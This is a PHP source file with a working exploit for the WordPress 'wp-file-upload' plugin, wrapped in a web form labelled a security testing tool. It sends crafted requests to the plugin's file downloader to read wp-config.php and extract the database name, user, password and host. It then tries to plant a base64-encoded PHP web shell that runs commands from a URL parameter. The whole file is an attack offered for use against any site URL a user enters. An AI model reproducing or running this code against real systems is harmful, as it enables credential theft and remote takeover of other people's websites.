<?php
// exploit.php - by chirag artani, use xampp to run code
header('Content-Type: text/html; charset=utf-8');

class WFUExploit {
    private $plugin_url;
    private $wordpress_url;
    private $output = '';
    
    public function __construct($wordpress_url) {
        $this->wordpress_url = rtrim($wordpress_url, '/');
        $this->plugin_url = $this->wordpress_url . '/wp-content/plugins/wp-file-upload/wfu_file_downloader.php';
    }

    private function log($message) {
        $this->output .= $message . "\n";
    }

    public function getOutput() {
        return $this->output;
    }

    private function createPayload($target_file, $abspath) {
        return json_encode([
            'type' => 'normal',
            'ticket' => 'ABC123',
            'filepath' => $target_file,
            'handler' => '',
            'expire' => time() + 3600,
            'wfu_ABSPATH' => $abspath,
            'wfu_browser_downloadfile_notexist' => 'File not found',
            'wfu_browser_downloadfile_failed' => 'Download failed'
        ], JSON_UNESCAPED_SLASHES);
    }

    private function extractContent($response) {
        if (strpos($response, "\r\n\r\n") !== false) {
            list($headers, $body) = explode("\r\n\r\n", $response, 2);
            return $body;
        }
        return $response;
    }

    private function parseWPConfig($content) {
        $config = [];
        $patterns = [
            'DB_NAME' => "/define\(\s*'DB_NAME',\s*'([^']+)'\s*\)/",
            'DB_USER' => "/define\(\s*'DB_USER',\s*'([^']+)'\s*\)/",
            'DB_PASSWORD' => "/define\(\s*'DB_PASSWORD',\s*'([^']+)'\s*\)/",
            'DB_HOST' => "/define\(\s*'DB_HOST',\s*'([^']+)'\s*\)/",
            'TABLE_PREFIX' => "/\\\$table_prefix\s*=\s*'([^']+)'/"
        ];
        
        foreach ($patterns as $key => $pattern) {
            preg_match($pattern, $content, $matches);
            $config[$key] = isset($matches[1]) ? $matches[1] : 'Not found';
        }
        
        return $config;
    }

    public function exploit($target_file) {
        $this->log("[*] Target: {$this->wordpress_url}");
        $this->log("[*] Attempting to read: $target_file");
        
        $wordpress_paths = [
            'C:/xampp/htdocs/wordpress/',
            'C:/xampp/htdocs/',
            '/var/www/html/wordpress/',
            '/var/www/html/',
            '../../../../',
            '../../../',
            '../../',
            '../',
            './'
        ];

        foreach ($wordpress_paths as $wp_path) {
            $this->log("[*] Testing path: $wp_path");
            
            $temp_dir = sys_get_temp_dir();
            $json_file = tempnam($temp_dir, 'wfu_');
            $payload = $this->createPayload($target_file, $wp_path);
            file_put_contents($json_file, $payload);
            
            $ch = curl_init();
            curl_setopt_array($ch, [
                CURLOPT_URL => $this->plugin_url,
                CURLOPT_POST => true,
                CURLOPT_POSTFIELDS => ['source' => basename($json_file)],
                CURLOPT_RETURNTRANSFER => true,
                CURLOPT_HEADER => true,
                CURLOPT_FOLLOWLOCATION => true,
                CURLOPT_SSL_VERIFYPEER => false,
                CURLOPT_SSL_VERIFYHOST => false,
                CURLOPT_TIMEOUT => 10
            ]);
            
            $response = curl_exec($ch);
            $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
            curl_close($ch);
            @unlink($json_file);
            
            if ($http_code == 200 && !empty($response)) {
                $content = $this->extractContent($response);
                
                if (strpos($target_file, "wp-config.php") !== false && strpos($content, "DB_NAME") !== false) {
                    $this->log("\n[+] WordPress Configuration Found!");
                    $config = $this->parseWPConfig($content);
                    foreach ($config as $key => $value) {
                        $this->log(sprintf("%-15s: %s", $key, $value));
                    }
                    return true;
                }
                elseif (strpos($target_file, "php://") === 0 || strpos($target_file, "data://") === 0) {
                    if (strpos($response, 'Failed to open stream') === false) {
                        $this->log("\n[+] RCE Upload Successful!");
                        $this->log("[*] Try accessing: {$this->wordpress_url}/shell.php?cmd=whoami");
                        return true;
                    }
                }
            }
        }
        
        return false;
    }
}

// HTML Interface
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['wordpress_url'])) {
    $wordpress_url = filter_var($_POST['wordpress_url'], FILTER_SANITIZE_URL);
    if (!filter_var($wordpress_url, FILTER_VALIDATE_URL)) {
        $error = "Invalid URL format";
    } else {
        $exploit = new WFUExploit($wordpress_url);
        
        ob_start();
        
        // Try reading wp-config.php
        $exploit->exploit("wp-config.php");
        
        // Try RCE
        $php_shell = '<?php if(isset($_GET["cmd"])){ system($_GET["cmd"]); } else { echo "Shell ready"; } ?>';
        $encoded_shell = base64_encode($php_shell);
        
        $exploit->exploit("data://text/plain;base64," . $encoded_shell);
        
        $result = $exploit->getOutput();
        ob_end_clean();
    }
}
?>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>WFU Security Testing Tool</title>
    <style>
        body {
            font-family: monospace;
            max-width: 900px;
            margin: 20px auto;
            padding: 20px;
            background: #f5f5f5;
        }
        .container {
            background: white;
            padding: 20px;
            border-radius: 5px;
            box-shadow: 0 2px 5px rgba(0,0,0,0.1);
        }
        h1 {
            color: #333;
            border-bottom: 2px solid #eee;
            padding-bottom: 10px;
        }
        .form-group {
            margin-bottom: 15px;
        }
        input[type="text"] {
            width: 100%;
            padding: 8px;
            font-family: monospace;
        }
        input[type="submit"] {
            background: #4CAF50;
            color: white;
            padding: 10px 20px;
            border: none;
            border-radius: 3px;
            cursor: pointer;
        }
        .output {
            background: #333;
            color: #fff;
            padding: 15px;
            border-radius: 3px;
            white-space: pre-wrap;
            margin-top: 20px;
        }
        .error {
            color: red;
            margin-bottom: 10px;
        }
    </style>
</head>
<body>
    <div class="container">
        <h1>WordPress File Upload Security Testing Tool</h1>
        <form method="POST" action="">
            <div class="form-group">
                <label for="wordpress_url">WordPress URL:</label><br>
                <input type="text" id="wordpress_url" name="wordpress_url" 
                       placeholder="https://example.com/wordpress" 
                       required>
            </div>
            <?php if (isset($error)): ?>
                <div class="error"><?php echo htmlspecialchars($error); ?></div>
            <?php endif; ?>
            <input type="submit" value="Test URL">
        </form>
        
        <?php if (isset($result)): ?>
            <div class="output"><?php echo htmlspecialchars($result); ?></div>
        <?php endif; ?>
    </div>
</body>
</html>